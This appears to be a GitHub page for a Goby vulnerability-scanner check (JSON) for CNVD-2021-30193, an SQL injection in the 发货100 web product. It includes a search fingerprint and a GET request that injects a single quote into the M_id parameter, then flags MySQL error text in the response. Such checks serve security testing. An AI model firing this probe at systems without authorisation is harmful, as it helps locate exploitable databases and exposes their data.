-
Notifications
You must be signed in to change notification settings - Fork 197
/
fahuo100_sql_injection_CNVD_2021_30193.json
53 lines (53 loc) · 1.89 KB
/
fahuo100_sql_injection_CNVD_2021_30193.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
{
"Name": "fahuo100_sql_injection_CNVD_2021_30193",
"Level": "3",
"Tags": [
"SQL Injection"
],
"GobyQuery": "header=\"Cache-Control: no-store, no-cache\"",
"Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息",
"Product": "发货100",
"Homepage": "https://www.fahuo100.cn/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/?M_id=1'&type=product",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "mysql",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Warning",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-03 22:27:28",
"GobyVersion": "1.8.268"
}